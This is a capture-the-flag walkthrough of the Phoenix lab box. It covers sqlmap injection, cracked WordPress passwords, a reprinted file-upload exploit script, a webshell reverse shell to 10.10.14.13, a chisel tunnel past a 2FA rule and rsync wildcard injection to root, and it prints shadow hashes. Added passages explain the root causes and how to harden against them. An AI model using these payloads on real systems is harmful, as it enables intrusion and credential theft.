Basic information

Port scan

22,80,443:

$ nmap -sC -sV 10.10.11.149
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 14:20 CST
Nmap scan report for 10.10.11.149
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
| 256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_ 256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open ssl/http Apache httpd
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after: 2032-02-13T20:08:43
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
| tls-alpn:
| h2
|_ http/1.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.21 seconds

80/443

A hosts entry needs to be added:

10.10.11.149 phoenix.htb

wordpress && Forum

Under Details there is a Read Blog link; you can register and log in, and it is a WordPress site:

There is also a forum, where viewing the members list yields some usernames:

Asgaros Forum

Looking at the page source shows that the forum is the WordPress plugin Asgaros Forum, version 1.15.12:

Related vulnerabilities can be found by searching:

SQL injection

The injection point is subscribe_topic; just throw sqlmap at it (very slow; this is where the 2.6 rating (the rating at the time this was done) came from):

Knowing it is WordPress, dump wp_users directly; enumerating all the tables takes too much time. The phoenix password was cracked, but login still has 2FA.

sqlmap --url https://phoenix.htb/forum/?subscribe_topic=1 --level 3 --risk 3 --batch
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch --dbs
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_users --dump
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_users -C user_login,user_pass --dump --threads 10

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

phoenix : phoenixthefirebird14

So another way is needed, for example via the plugins, exploiting a plugin vulnerability:

sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump

One of the plugins has a known vulnerability:

webshell

Exploit the plugin vulnerability to get a shell. Because the site is HTTPS, the exploit needs modifying: add verify=False to the requests. Also, the shell needs to be in phtml format:

reverse shell

Execute a command through the webshell to get a reverse shell:

https://phoenix.htb/wp-admin/shell.phtml?cmd=bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.13/4444%20%3C%261'

databases

available databases [2]:
[*] information_schema
[*] wordpress

wp_users

Database: wordpress
Table: wp_users
[5 entries]
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| john | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Phoenix | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| Jane | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jsmith | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jack | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
+------------+------------------------------------+

exp.py

# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests
import sys

def print_banner():
    print("Download From Files <= 1.48 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
    # verify=False added so the check works against the self-signed HTTPS site
    response = requests.get(uri, verify=False)
    raw = response.text

    if ("Sikeres" in raw):
        return True
    else:
        return False

def main():

    print_banner()
    if(len(sys.argv) != 3):
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = 'download_from_files_617_fileupload'
    admin = '/wp-admin/admin-ajax.php'

    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)

    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'files[]' : open(file_path)}
    data = {
        "allowExt" : "php4,phtml",
        "filesName" : "files",
        "maxSize" : "1000",
        "uploadDir" : "."
    }
    print("Uploading Shell...")
    # verify=False added here as well for the HTTPS target
    response = requests.post(uri, files=files, data=data, verify=False)
    file_name = path.basename(file_path)
    if("ok" in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + "wp-admin/" + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main()
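The root cause the exploit above relies on is that the plugin takes the extension allowlist (allowExt) and the destination (uploadDir) from the request itself. As an added illustration (not the plugin's code and not from the original post), the following shows that flaw beside a handler that enforces a server-side policy; the request body, the allowlist and the upload directory are constructed values.

```python
import posixpath

# Constructed request body, shaped like the exploit's POST above.
UPLOAD_REQUEST = {
    "allowExt": "php4,phtml",   # client-supplied in the vulnerable plugin
    "uploadDir": ".",           # client-supplied too
    "filename": "shell.phtml",
}

# Server-side policy the hardened handler uses instead of the request fields
# (assumed values; the real plugin's configuration is not on the page).
SERVER_ALLOWED_EXT = {"pdf", "png", "jpg", "zip"}
SERVER_UPLOAD_DIR = "/var/www/uploads"

def ext_of(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def vulnerable_accepts(req):
    """Mirrors the flaw: the extension allowlist comes from the request itself."""
    allowed = {e.strip().lower() for e in req["allowExt"].split(",")}
    return ext_of(req["filename"]) in allowed

def hardened_target(req):
    """Destination path for the upload, or None when it must be rejected.
    allowExt and uploadDir from the request are deliberately never read."""
    name = posixpath.basename(req["filename"])
    if name != req["filename"] or name.startswith(".") or "." not in name:
        return None                      # path components, dotfiles, no extension
    # Every dotted suffix must be an allowed extension, so shell.phtml.png is
    # rejected too (Apache can hand multi-extension names to a PHP handler).
    if not all(s in SERVER_ALLOWED_EXT for s in name.lower().split(".")[1:]):
        return None
    target = posixpath.normpath(posixpath.join(SERVER_UPLOAD_DIR, name))
    if not target.startswith(SERVER_UPLOAD_DIR + "/"):
        return None                      # defence in depth against traversal
    return target
```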

Information gathering

The database password is obtained from wp-config.php:

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );

The user john can be found in /etc/passwd; his password, cracked from the hash obtained earlier, is superphoenix, but switching to him directly also hits 2FA:

Looking at the /etc/pam.d/sshd configuration, you can find

auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf

Looking at that configuration, only 10.11.2.13/24 is allowed to SSH:

So a tunnel is needed in order to SSH from the eth0 IP.
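Why the source address decides whether 2FA runs: in the pam.d line above, `[success=1 default=ignore]` means that when pam_access succeeds the next module in the stack is skipped, and any other result is ignored so the chain continues. The following added evaluator (not from the original post) models the access.conf rule format that pam_access reads and that skip; the rule file contents and the names of the modules following pam_access are assumptions, since the post only describes their effect.

```python
import ipaddress

# Constructed rule file in access.conf syntax ("permission : users : origins");
# the post's real file was not reproduced, only its effect was described.
ACCESS_LOCAL_CONF = """\
# allow any user from the internal subnet, deny everyone else
+ : ALL : 10.11.2.0/24
- : ALL : ALL
"""

def parse_rules(text):
    """Return (allow, users, origins) tuples, skipping comments and blanks."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        perm, users, origins = (f.strip() for f in line.split(":", 2))
        rules.append((perm == "+", users.split(), origins.split()))
    return rules

def origin_matches(origin, src_ip):
    """Only ALL and network/CIDR origins are modelled here, not hostnames."""
    if origin == "ALL":
        return True
    try:
        return ipaddress.ip_address(src_ip) in ipaddress.ip_network(origin, strict=False)
    except ValueError:
        return False

def pam_access_allows(rules, user, src_ip):
    """First matching rule decides; pam_access grants access when none matches."""
    for allow, users, origins in rules:
        if ("ALL" in users or user in users) and any(origin_matches(o, src_ip) for o in origins):
            return allow
    return True

def sshd_auth_chain(rules, user, src_ip):
    """Modules that actually run for a stack shaped like the page's line:
         auth [success=1 default=ignore] pam_access.so accessfile=...
         auth required <second-factor module>     # assumed, e.g. a TOTP module
         auth required pam_unix.so                # assumed password check
       Success in pam_access jumps over exactly one module (the second factor);
       any other result is ignored and the chain continues with it."""
    chain = ["pam_access"]
    if not pam_access_allows(rules, user, src_ip):
        chain.append("second_factor")
    chain.append("pam_unix")
    return chain
```

The defensive takeaway is that a "trusted network skips 2FA" rule is only as strong as the assumption that nobody can originate traffic from that network, which a reverse tunnel on the host breaks.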

user flag

Set up the tunnel, then connect via SSH:

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 6969 --reverse

# target
./chisel_1.7.6_linux_amd64 client 10.10.14.13:6969 R:2222:10.11.12.13:22

# local
ssh editor@127.0.0.1 -p 2222
superphoenix

Privilege escalation information

There is a cron.sh.x in /usr/local/bin.

Running it manually while monitoring with pspy64 shows that it calls rsync with a wildcard:

rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/

That is, it syncs the files in the /backups directory via rsync; the exploitation method is the standard GTFOBins one:

Privilege escalation && root flag

Note that the filename needs an extension, because the rsync command uses *.*

cd /backups

/bin/bash -i >& /dev/tcp/10.10.14.13/4444 0>&1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo=

echo "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo= | base64 -d | bash" > shell.miao
touch -- "-e sh shell.miao"
chmod +x shell.miao
chmod +x -- '-e sh shell.miao'

(The screenshot here has a problem with the filename and failed; too lazy to replace it with a new image. Note what was said earlier: the filename needs an extension.)

Wait for execution (it runs automatically every 3 minutes); our custom command is run successfully and we get a root shell:
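The cron job is exploitable only because the shell expands an unanchored `*.*` and rsync then parses a file name that starts with `-` as an option. As an added illustration (not from the original post), the block below builds the argument vector the shell would hand to rsync from a constructed temporary directory, shows the anchored form with `--` and a `./` prefix that a hardened cron script should use, and includes a check an auditor can run over such argument lists; rsync itself is never invoked.

```python
import glob
import os
import tempfile

REMOTE = "jit@10.11.12.14:/backups/"   # destination from the page's cron command

def rsync_argv(backup_dir, anchored):
    """Argument vector the shell builds for the cron command.
    anchored=False mirrors:  rsync --ignore-existing -t *.* jit@host:/backups/
    anchored=True  mirrors:  rsync --ignore-existing -t -- ./*.* jit@host:/backups/
    The glob is expanded inside backup_dir, as the cron job does in /backups."""
    cwd = os.getcwd()
    os.chdir(backup_dir)
    try:
        expanded = sorted(glob.glob("./*.*" if anchored else "*.*"))
    finally:
        os.chdir(cwd)
    argv = ["rsync", "--ignore-existing", "-t"]
    if anchored:
        argv.append("--")              # end of options; ./ prefix is a second guard
    return argv + expanded + [REMOTE]

def option_like_operands(argv):
    """Audit check: file operands that rsync would parse as options instead."""
    if "--" in argv:
        operands = argv[argv.index("--") + 1:-1]
    else:
        operands = argv[3:-1]
    return [a for a in operands if a.startswith("-")]

def demo():
    """Constructed /backups directory holding one normal file and one file
    whose name is shaped like the page's 'touch -- "-e sh shell.miao"'."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("data.txt", "-e sh shell.miao"):
            open(os.path.join(d, name), "w").close()
        return rsync_argv(d, False), rsync_argv(d, True)
```

Besides anchoring the glob, the job should not run as root over a directory that a lower-privileged user can write to; a file-creation watch on /backups for names beginning with `-` is a cheap detection for this pattern.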

shadow

root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::
phoenix:$6$gLLB4KeGdb5Hnsc2$t6EYvvoh1DnVbPUbySB.0IVNgQicWBhS87fatD7umPj9PAKs8ZDvwHcrwp.dV/ZFnQDXCOc81pGrLcKyRuUtl0:19046:0:99999:7:::
editor:$6$CoywBsVPjctrApY9$P16ZwO5otTjkUm1B8kz8aKpgvC0mEK6g9Mq2wexdaRdF4kT3LuSM56R3BbJm28fp/39vUGJBRbPyw8r34PO1u/:19039:0:99999:7:::

References